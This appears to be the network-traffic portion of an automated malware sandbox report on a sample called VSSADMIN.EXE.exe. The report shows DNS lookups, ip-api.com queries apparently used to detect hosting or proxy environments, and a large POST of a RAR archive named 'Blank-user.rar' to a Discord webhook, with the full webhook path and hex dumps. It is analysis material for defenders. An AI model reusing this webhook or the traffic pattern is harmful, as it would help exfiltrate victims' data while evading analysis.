                                                                                                                                                                    Sep 15, 2023 22:16:21.306338072 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:21.306416035 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:21.306446075 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:21.306576967 CEST44349718162.159.138.232192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:21.306633949 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:21.313198090 CEST49718443192.168.2.4162.159.138.232
                                                                                                                                                                    Sep 15, 2023 22:16:21.329801083 CEST4971780192.168.2.4208.95.112.1
                                                                                                                                                                    Sep 15, 2023 22:16:21.426608086 CEST8049717208.95.112.1192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:21.426765919 CEST4971780192.168.2.4208.95.112.1

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Sep 15, 2023 22:15:57.744563103 CEST6336253192.168.2.48.8.8.8
                                                                                                                                                                    Sep 15, 2023 22:15:58.351931095 CEST53633628.8.8.8192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:15:58.361323118 CEST4981753192.168.2.48.8.8.8
                                                                                                                                                                    Sep 15, 2023 22:15:58.462224960 CEST53498178.8.8.8192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:15:58.484169960 CEST6255053192.168.2.48.8.8.8
                                                                                                                                                                    Sep 15, 2023 22:15:58.587532997 CEST53625508.8.8.8192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:15:58.592437983 CEST5330053192.168.2.48.8.8.8
                                                                                                                                                                    Sep 15, 2023 22:15:58.691107035 CEST53533008.8.8.8192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:15:59.654330969 CEST6480353192.168.2.48.8.8.8
                                                                                                                                                                    Sep 15, 2023 22:15:59.760168076 CEST53648038.8.8.8192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:19.128405094 CEST5438853192.168.2.48.8.8.8
                                                                                                                                                                    Sep 15, 2023 22:16:19.235579967 CEST53543888.8.8.8192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:16:19.757888079 CEST5845853192.168.2.48.8.8.8
                                                                                                                                                                    Sep 15, 2023 22:16:19.858509064 CEST53584588.8.8.8192.168.2.4
                                                                                                                                                                    Sep 15, 2023 22:17:21.707096100 CEST5886753192.168.2.48.8.8.8

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Sep 15, 2023 22:15:57.744563103 CEST192.168.2.48.8.8.80xcc3fStandard query (0)blank-2md3e.inA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:15:58.361323118 CEST192.168.2.48.8.8.80x5940Standard query (0)blank-2md3e.inA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:15:58.484169960 CEST192.168.2.48.8.8.80xa01aStandard query (0)blank-2md3e.inA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:15:58.592437983 CEST192.168.2.48.8.8.80xdca4Standard query (0)blank-2md3e.inA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:15:59.654330969 CEST192.168.2.48.8.8.80x287Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:16:19.128405094 CEST192.168.2.48.8.8.80x9906Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:16:19.757888079 CEST192.168.2.48.8.8.80x4f8eStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:17:21.707096100 CEST192.168.2.48.8.8.80x3179Standard query (0)tse1.mm.bing.netA (IP address)IN (0x0001)false

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Sep 15, 2023 22:15:58.351931095 CEST8.8.8.8192.168.2.40xcc3fName error (3)blank-2md3e.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:15:58.462224960 CEST8.8.8.8192.168.2.40x5940Name error (3)blank-2md3e.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:15:58.587532997 CEST8.8.8.8192.168.2.40xa01aName error (3)blank-2md3e.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:15:58.691107035 CEST8.8.8.8192.168.2.40xdca4Name error (3)blank-2md3e.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:15:59.760168076 CEST8.8.8.8192.168.2.40x287No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:16:19.235579967 CEST8.8.8.8192.168.2.40x9906No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:16:19.858509064 CEST8.8.8.8192.168.2.40x4f8eNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:16:19.858509064 CEST8.8.8.8192.168.2.40x4f8eNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:16:19.858509064 CEST8.8.8.8192.168.2.40x4f8eNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:16:19.858509064 CEST8.8.8.8192.168.2.40x4f8eNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:16:19.858509064 CEST8.8.8.8192.168.2.40x4f8eNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 15, 2023 22:17:21.809499025 CEST8.8.8.8192.168.2.40x3179No error (0)tse1.mm.bing.netmm-mm.bing.net.trafficmanager.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                    • discord.com
                                                                                                                                                                    • ip-api.com

                                                                                                                                                                    HTTP Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    0192.168.2.449718162.159.138.232443C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    1192.168.2.449715208.95.112.180C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Sep 15, 2023 22:15:59.859786034 CEST9OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                    User-Agent: python-urllib3/2.0.4
                                                                                                                                                                    Sep 15, 2023 22:15:59.958157063 CEST9INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Fri, 15 Sep 2023 20:15:59 GMT
                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                    Content-Length: 6
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                    Data Ascii: false


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    2192.168.2.449717208.95.112.180C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Sep 15, 2023 22:16:19.333969116 CEST16OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                    User-Agent: python-urllib3/2.0.4
                                                                                                                                                                    Sep 15, 2023 22:16:19.459372044 CEST17INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Fri, 15 Sep 2023 20:16:19 GMT
                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                    Content-Length: 166
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    X-Ttl: 40
                                                                                                                                                                    X-Rl: 43
                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 74 72 75 65 2c 22 71 75 65 72 79 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 30 39 22 7d
                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"","mobile":false,"proxy":true,"query":"191.96.150.209"}


                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    0192.168.2.449718162.159.138.232443C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    2023-09-15 20:16:20 UTC0OUTPOST /api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2k HTTP/1.1
                                                                                                                                                                    Host: discord.com
                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                    Content-Length: 838652
                                                                                                                                                                    User-Agent: python-urllib3/2.0.4
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=df04b12a7b80d1dae6cbaca19bb29ce2
                                                                                                                                                                    2023-09-15 20:16:20 UTC0OUTData Raw: 2d 2d 64 66 30 34 62 31 32 61 37 62 38 30 64 31 64 61 65 36 63 62 61 63 61 31 39 62 62 32 39 63 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 f1 55 78 45 21 04 00 00 01 0f 0f a7 d5 56 90 4a 8b ae 6c 0e 82 15 a1 26 96 55 c0 a3 3b 45 eb 35 16 eb c3 4d 31 10 06 5b d0 3b c2 db 7f 7a 2c 89 1e ca 5a a9 1c 4c 7a 12 cb ee 9f 26 66 e8 5b 07 b0 d6 99 79 d3 63 f1 e7 ba 57 5e e4 7f 70 fa f4 72 a2 13 6e aa 43 db 57 fb 22 d0 c6 61 0e c0 6c
                                                                                                                                                                    Data Ascii: --df04b12a7b80d1dae6cbaca19bb29ce2Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!UxE!VJl&U;E5M1[;z,ZLz&f[ycW^prnCW"al
                                                                                                                                                                    2023-09-15 20:16:20 UTC16OUTData Raw: 23 29 d9 70 54 31 5f 4b 03 79 42 64 10 6a f2 8d f2 09 de b3 3e 2e 8a 81 9f 16 d1 87 94 c9 59 38 a8 ae 8d cb dd 89 95 86 bd c6 36 1c 76 68 5b bc 46 bb fa 63 0d a7 0b 67 80 c4 8f 88 ab 2e 5b 3c 35 4c fc d3 06 4d cb 8f 0e 75 76 72 08 9c 63 1c d8 38 29 79 89 da 21 b8 e2 b9 42 49 a5 7b 07 48 00 9f fc 1f a6 89 1b 4a 1e b7 dd 35 b8 55 52 c4 54 8f 7f b5 3f 7b 10 8c 28 e5 b6 89 3d 05 4d 52 3f 28 37 ca 58 b8 d1 8c cf a0 a9 c8 d5 b9 b6 21 b4 be dc 1c 3a 76 e9 7a 6b 36 6a 9e 0a 7f e8 0b bf e7 ed 8a 74 5c ac 61 92 3a d7 9a 3c 40 9a 24 ec d5 a2 77 6f 1b e9 46 15 4f af 6e 3b 85 3e 6f 32 3b 03 b7 5e 45 f1 77 ae e2 ee d1 8e e8 73 85 c2 9e cd 13 d7 b2 ac e2 98 4f 02 bd 6d 53 d6 35 8b c5 cd 7b b4 0d 9a 67 03 01 6c ad 6d 48 2d 57 dd 03 37 45 d5 25 cc 99 6d 22 d9 62 15 16 e6
                                                                                                                                                                    Data Ascii: #)pT1_KyBdj>.Y86vh[Fcg.[<5LMuvrc8)y!BI{HJ5URT?{(=MR?(7X!:vzk6jt\a:<@$woFOn;>o2;^EwsOmS5{glmH-W7E%m"b
                                                                                                                                                                    2023-09-15 20:16:20 UTC32OUTData Raw: 47 4a c0 1c af 80 ef da 48 d8 6d 95 2e 9d aa 92 71 5a ff f5 7a 6b 79 2f 1a 7e 15 6a fa 9f 27 19 ec 10 37 ec 4e 7a 97 f0 55 2e 55 04 db 36 ad 04 74 6e 08 43 4f bb 5e 9e 7b b0 d4 d2 e4 4b 46 49 b9 a4 c4 24 62 97 52 92 5f 87 97 76 53 8d cb 89 62 5d a3 4a d3 50 ca 15 08 d6 cc 99 03 bc 4d 86 76 5b 7d a3 f3 51 01 78 8a aa 52 7b 45 75 21 c0 d9 b9 17 9b 2a e6 bc bd b8 5c 60 3f 47 0d 31 e2 8c c7 ee bf e0 3c ea fc 37 c8 6d 3e 39 3c 0e 9a bc db e0 d0 44 48 9b 1c 0c bc a0 9f 06 f7 9b 77 bb 4e 8f 73 76 18 2b 04 cb 16 dd 51 a0 ba 25 e4 57 ba 7e 18 da a5 1f e3 5c 59 c9 b7 8f 6f 4a 58 ea 8d 97 c8 2c 9e d4 df 4f 5b 8f 0b 1b a8 ff ae 2a 0b ae 59 d1 8f 02 f0 ec 72 c4 4e ac fe c2 49 d1 ca ed 13 6e 44 47 04 3e 14 36 3e 1c 20 89 f8 b8 d5 bc 54 bc a2 da 68 58 2f 3a 8c 18 32 fd
                                                                                                                                                                    Data Ascii: GJHm.qZzky/~j'7NzU.U6tnCO^{KFI$bR_vSb]JPMv[}QxR{Eu!*\`?G1<7m>9<DHwNsv+Q%W~\YoJX,O[*YrNInDG>6> ThX/:2
                                                                                                                                                                    2023-09-15 20:16:20 UTC48OUTData Raw: 63 9a 23 d2 84 41 9f cd cc ab 02 58 90 15 40 4b 26 42 9e a1 3a 56 10 18 dd 81 50 17 bf 60 d5 f8 19 83 33 0c 4e 83 b0 84 c9 d4 2e 36 1e ec 9c 33 14 68 31 10 88 05 b6 f3 eb f3 28 73 ac de 9e eb 20 e4 1a 61 26 b5 ec ec f3 75 47 4a 87 a6 2d 51 b0 64 04 d6 ee a3 48 68 ac 20 68 5f ed 39 07 1c 1e 99 75 25 d0 28 0a 48 97 e4 69 5d ea 18 29 00 08 58 5a 33 a7 eb 6c ca 7d f4 05 f5 f4 fb 25 1a 7d 2d da 2a 89 4d db 33 4f ce 6a 76 38 6d 23 af 16 47 e4 d1 13 92 03 fb 91 b3 a5 3f 3e 59 5e 8c d1 e4 89 ad 7d 86 5c 37 af 7c b0 b3 b8 c5 a9 50 86 3f 7c 4c 08 26 a3 09 71 64 73 0a 3b a8 81 2e f8 9a b4 ab ab 73 f4 b6 9b 25 98 f4 35 33 5d 60 b8 d4 23 ea b8 d5 ff 98 5c cd 44 14 c2 6c b0 f1 50 12 66 10 1f 80 c1 9f 6e 8f e7 4d 98 b0 a9 93 f5 83 c1 c9 fa 9c 31 e0 d1 1d b1 d5 e5 00 0e
                                                                                                                                                                    Data Ascii: c#AX@K&B:VP`3N.63h1(s a&uGJ-QdHh h_9u%(Hi])XZ3l}%}-*M3Ojv8m#G?>Y^}\7|P?|L&qds;.s%53]`#\DlPfnM1
                                                                                                                                                                    2023-09-15 20:16:20 UTC64OUTData Raw: c7 17 84 61 a8 24 0d c2 7e a6 97 8c 9f 85 5a d8 73 ea 77 8e 89 b6 22 08 8f 10 db d2 d5 69 ee 43 a0 23 2f a0 42 07 b9 e1 6b a1 fe 0e 5b fd 13 50 33 05 9c 9a df 76 aa ec 2d 0e 70 23 71 04 37 a0 c7 a4 87 fd 3f ea f6 df 55 22 b5 1c c7 cb 68 e3 87 8d 51 72 14 2b c7 bd be c0 17 a0 76 f2 55 1b c4 e9 d4 04 e4 b0 cb 04 f3 ae e9 b5 23 8e 33 33 2f 1e 7f 0b 65 85 91 f2 52 71 38 6a e2 1c 9a ca a7 e4 73 59 bb e0 53 df 58 fc 32 25 5e 92 76 09 80 c9 1f 56 61 31 3a 81 59 8e e9 ab f7 4c 80 c2 d5 43 dd e5 05 06 2f 33 9d 42 46 c9 bf cc 63 c4 0c 36 07 85 b6 ec 6a e3 1e 92 6c 5f 2b b5 a1 64 9e a3 4a 25 aa 4d 20 b8 15 f3 3f 40 e4 ed 80 bf c6 06 ab ba 9e eb 6e ef 17 18 7d cf b5 a3 bc 6f 99 52 42 49 6c a0 cd ef b4 99 98 c0 ba 9a 26 a5 75 f1 b9 04 06 9d 3e ca 36 c6 0b 9d 0e b3 15
                                                                                                                                                                    Data Ascii: a$~Zsw"iC#/Bk[P3v-p#q7?U"hQr+vU#33/eRq8jsYSX2%^vVa1:YLC/3BFc6jl_+dJ%M ?@n}oRBIl&u>6
                                                                                                                                                                    2023-09-15 20:16:20 UTC80OUTData Raw: b0 d6 ab e4 a5 5d 51 0b ad e4 24 ec 8b c1 42 ff 0f 75 98 62 69 25 0a 3c c0 dd 23 2c 49 92 f8 7a 46 19 f8 c3 e1 30 59 87 c4 a9 ab 98 9e 83 b0 66 93 bc 75 88 ee 67 8f 35 e2 25 04 31 3e 01 60 cb 17 a4 8a 34 82 cc c4 51 3e b1 c9 59 9f b5 f3 3f fb 85 a0 0c b4 7f 47 61 55 1b 51 42 a8 f1 ca de b7 9f 6c ae db 86 46 89 ba 43 26 0f 3a d9 55 ed 75 f1 d6 a0 2d db 75 5e ff 7a b4 bd 6f 0f 46 47 37 73 c6 7b 2e 64 6a c1 52 ee 79 83 fc 41 9b b0 c9 06 f1 f3 31 f9 ac 5c b2 44 d9 d1 c0 11 a9 00 08 66 fd 53 54 eb 1b b7 dc 6a b6 21 b0 82 f7 04 08 d7 c1 9e 74 fa 30 34 99 7c ad 61 6c b3 fd 23 30 a2 60 ca b9 8b 58 84 b3 9f f3 de 7d e1 fb a0 fb 00 82 78 fc 2f d0 88 a5 0a e0 da a8 85 18 90 ef 10 76 88 6a 50 7f f2 80 cc 16 40 16 b9 60 ab 63 6f 06 b7 63 b3 a6 b4 37 9d 26 ce 47 8d 0c
                                                                                                                                                                    Data Ascii: ]Q$Bubi%<#,IzF0Yfug5%1>`4Q>Y?GaUQBlFC&:Uu-u^zoFG7s{.djRyA1\DfSTj!t04|al#0`X}x/vjP@`coc7&G
                                                                                                                                                                    2023-09-15 20:16:20 UTC96OUTData Raw: 3b 60 32 41 b7 45 68 0e d3 8d 17 2d ff e1 86 9f b2 33 ab 94 0c 3b 6f 66 b8 b9 3b 0d 89 fc c8 0e 75 15 90 d8 f4 77 9c ac f0 cd cd 44 1c a6 29 a6 85 55 c4 d6 c8 b7 f7 76 a2 9a a6 57 b8 86 3e d8 18 6d b9 1b 1f ae aa 08 4f 75 fd 36 1f 9f d6 03 e6 d3 1b 59 d1 78 ef 95 01 68 53 04 f8 5a f1 f9 4f dd 1e 38 eb fc 25 18 64 89 c0 b9 55 98 7b a8 d5 79 3b 44 72 61 1c 35 75 d0 b1 86 83 15 ad 5f 82 32 25 6f 86 70 a2 54 13 5e e6 66 9b 49 db 36 d6 8f fc 12 00 53 06 93 ea f6 3b ee 44 40 ab 51 df 60 ad 7f 63 28 a7 08 6c 98 be 34 6d 73 c4 35 a9 b0 04 8c d3 bf 11 bb 86 db a6 a4 c8 3b db ea cc c8 a7 cd 1e cb 5c 04 90 24 98 d5 58 de 9c 3a 4c 58 9a 01 fb 79 8e 61 92 5e a6 e5 91 e0 bc 3e 50 b3 8b 57 88 18 3a 1a 89 98 77 b2 98 1a a9 f4 5e 03 a6 7c 57 5e a2 89 14 8a 05 17 5d 9f a8
                                                                                                                                                                    Data Ascii: ;`2AEh-3;of;uwD)UvW>mOu6YxhSZO8%dU{y;Dra5u_2%opT^fI6S;D@Q`c(l4ms5;\$X:LXya^>PW:w^|W^]
                                                                                                                                                                    2023-09-15 20:16:20 UTC112OUTData Raw: ea ee 11 8f ef 10 e7 56 b9 65 57 07 95 25 69 6d 53 97 d0 4a e6 bb f8 01 1f e3 22 41 41 47 03 c0 04 93 7e cb ba f2 de 8f fb 75 3a d9 7a 72 ab 49 fd 5b ff 37 5b fa 46 00 65 00 ae 12 cf e9 9b 9c 77 28 d8 2b 31 a2 f7 37 cb 9c 74 09 38 3a 75 a6 bc 23 76 88 b6 14 9c 6c 7a 7e b7 1a 34 ae e3 a1 19 7b 55 1a 68 a2 f1 ed eb 88 35 af 49 2f 0c bf 81 39 82 f7 8a 1e 69 8b 81 1a ad 31 bb df 2f ec 8b 8b bc da 1b 8c 5b ce d5 9e e6 6e 3e 0e 1b 63 52 02 ce c3 cc 48 27 68 cc c4 0f d8 94 45 55 67 90 52 b7 96 89 e5 8f 1f 19 e7 b1 e2 06 23 20 9a b3 4b 87 94 8a dc 1c 00 b9 b4 d5 16 1a 61 ba 85 60 21 15 f2 0d 18 67 3e 47 62 c9 2d 48 9b 23 c0 0f 88 de 3b 08 7b 52 3d b3 a5 dc 89 7a fc 05 e0 f6 88 7f d0 3a bb 7f 91 41 d6 8f 34 42 f5 ad 8e 80 c1 d9 6e 22 22 74 e2 d7 2d 32 17 5f 1f 14
                                                                                                                                                                    Data Ascii: VeW%imSJ"AAG~u:zrI[7[Few(+17t8:u#vlz~4{Uh5I/9i1/[n>cRH'hEUgR# Ka`!g>Gb-H#;{R=z:A4Bn""t-2_
                                                                                                                                                                    2023-09-15 20:16:20 UTC128OUTData Raw: 26 de 7a 01 68 b8 50 3b 27 3b d5 f1 cd d1 9a af b4 31 fe c0 7e 18 85 fe 1a ca 50 46 88 9b b2 7d 71 75 07 89 4a ad 27 64 7c ba 51 c3 c2 d5 70 19 2f e7 09 54 62 4a 76 2e e5 d9 fd 23 ae b4 ea 39 16 91 92 1c 3f 32 03 18 20 66 95 88 3e c1 7e fd b1 c3 d4 5c a8 39 b8 7d bf 71 10 5c cd 8b 37 54 0e 9f ec 0c 56 a9 ab 09 50 65 1d 17 85 0f e7 f0 f8 5a fa 3b 47 3d b1 3f 0d e7 91 74 37 1a 68 fc ff f0 6e b8 02 d8 40 6b 6c 8f 51 b5 34 be d1 ce af c3 db db be ef 55 73 1d cf 5c fa 70 49 b6 21 f3 06 99 b7 2b a8 13 9e 5a 62 3d f4 ba 12 48 2e e3 72 0f f2 07 9b 62 3e 7c ec 85 65 0e 72 e5 80 1e 31 70 b6 1c f1 5b b7 54 2e f8 22 cd fa 65 27 26 9f 80 84 2c 0d 8d 50 77 f5 27 a7 1c 31 16 57 5a 9a 5a ea eb 6e c3 24 a0 11 ac 5c 99 d0 11 dc 98 f7 85 6e a7 d9 53 26 ff be 0a 69 d4 cb 49
                                                                                                                                                                    Data Ascii: &zhP;';1~PF}quJ'd|Qp/TbJv.#9?2 f>~\9}q\7TVPeZ;G=?t7hn@klQ4Us\pI!+Zb=H.rb>|er1p[T."e'&,Pw'1WZZn$\nS&iI
                                                                                                                                                                    2023-09-15 20:16:20 UTC144OUTData Raw: 41 9f fc 2d ca ed ff e7 17 17 32 db aa da 5a 87 ef 52 8d 65 59 7f e7 d2 37 19 30 9b 58 e9 3e 82 07 8e 65 f3 09 5d ae 2e 89 dd 36 66 5d 4f 29 03 ef 2b 8d 00 fd b5 09 f1 36 0d c0 d3 8e 1b c6 57 51 9f c8 ba e0 8e d4 e3 57 c1 7f 91 72 ea 0e ec 23 98 c5 46 df 18 02 52 df 14 55 9f 70 34 e8 a2 f8 28 28 c5 f2 d0 7c 50 8a 34 8b 6f b6 e4 d5 bf 93 03 88 58 24 97 57 24 36 4f 9e 0d f3 7d 89 42 94 b7 73 96 cf fb 6c 82 4a 2e 58 25 f8 8a 45 1c 27 b0 18 13 c9 a4 ad f3 dd 14 b9 ae 1a 6f 19 3d 8d ce a8 34 0f b8 c3 b9 a8 89 c4 72 47 e7 bd 14 8b 50 bc 93 41 18 17 b4 f5 53 d5 55 c7 f2 c8 41 9a 9a 54 55 f1 00 f1 ed 9d 24 14 72 66 b6 ce 5f df c0 26 50 c9 65 ee be 29 d3 d4 17 cb 41 e4 fb 58 5e 25 fa 0d af 8e 4b 0d 78 3b dc 5e 02 96 0f bb 13 be 52 a0 99 74 6d 32 83 9a cd 95 0c ce
                                                                                                                                                                    Data Ascii: A-2ZReY70X>e].6f]O)+6WQWr#FRUp4((|P4oX$W$6O}BslJ.X%E'o=4rGPASUATU$rf_&Pe)AX^%Kx;^Rtm2
                                                                                                                                                                    2023-09-15 20:16:20 UTC160OUTData Raw: 4d 76 06 1b bd 9c 0d 5c 11 cd 20 5a 0d 22 ab a8 51 51 88 be 45 f6 c8 a0 f7 ab 5e ea ad 1b 58 96 19 c4 8d c5 28 9f 7a 6c 59 3c 3f 7f da 73 a0 1f 63 0f c8 e6 f0 fb 2f bf a9 ee 07 f6 ec ae ba 83 99 fe 35 12 31 51 e9 3a a1 01 fb e1 8b 59 4a f3 36 41 2a fa 3e 8e 88 4e 18 a2 1b 80 d0 89 13 8f d0 22 b5 42 36 81 c8 93 39 9d e5 b4 aa ac 39 7c 6a 0c e2 e4 5a d1 51 22 7c 31 1e 72 35 98 16 3b 12 07 40 ad 28 ae 05 1b f2 47 b7 4d 8a 3b b1 88 70 b0 da 59 8b 46 22 04 52 74 62 28 be 41 de 5b 6b d6 41 c9 a0 fe fa 06 32 52 89 a6 b6 08 c9 a0 62 ce 2d 3d d9 bd 56 6b be 77 44 3f c9 29 42 9e 73 45 33 bb ba 3b 2a eb bc 15 09 7a c6 fc 05 59 69 b3 98 eb 74 aa 3f 22 c3 1f e8 ee 5a 69 3f e3 03 9e 52 06 2f df d5 2b 23 28 c6 d2 e0 1f 6a bd 6b ef 19 5e 5e 09 e9 ec fb bb b4 54 e1 b9 57
                                                                                                                                                                    Data Ascii: Mv\ Z"QQE^X(zlY<?sc/51Q:YJ6A*>N"B699|jZQ"|1r5;@(GM;pYF"Rtb(A[kA2Rb-=VkwD?)BsE3;*zYit?"Zi?R/+#(jk^^TW
                                                                                                                                                                    2023-09-15 20:16:20 UTC176OUTData Raw: 0f 61 fa a9 1a a4 67 ed 73 29 ee a0 9c 05 36 95 3e 6e fe 26 00 63 ad e1 86 d3 47 9d f3 bf b0 f2 f3 f1 c1 4d 66 07 46 ef 6b 20 25 9f b3 be 5e e0 62 b2 64 87 a7 99 cb 2f c1 27 2a 6f 08 c2 ec b6 16 90 67 b7 c9 f7 6a 9f cd 7e db 49 ef 5a 6a 9a 2c bc 79 12 88 79 6c 00 3f ab d3 e8 08 4d 93 61 18 1a 26 ea cc 00 0f 46 ea c4 3f 33 3e 81 a6 ad a2 c6 2a 66 fd 2c d4 a1 ab ff 80 ff db 1a 6f 8e 16 d3 ee 54 46 6c d8 13 06 97 a8 cd 79 05 c4 0f e6 1a cf d2 dd c2 27 a5 e3 5e 38 c5 88 57 14 da fb 75 11 03 ee 1a 54 de d2 e0 81 d4 7a 7b f1 a0 fe 1d 7e a0 1d 74 d4 c3 db 6f 87 11 4d 64 bb a2 d9 a4 79 84 59 ca 4d f2 3b 08 a0 ae 0c 2c af 06 4e 2c e8 b1 f7 fe ea 1a 94 b4 e4 35 2f b0 9e 1d 10 78 49 52 d1 36 31 1e 37 c7 e5 8c 58 f6 66 41 8b de b9 b0 a4 8f 55 96 ef e9 5c ce a1 eb 10
                                                                                                                                                                    Data Ascii: ags)6>n&cGMfFk %^bd/'*ogj~IZj,yyl?Ma&F?3>*f,oTFly'^8WuTz{~toMdyYM;,N,5/xIR617XfAU\
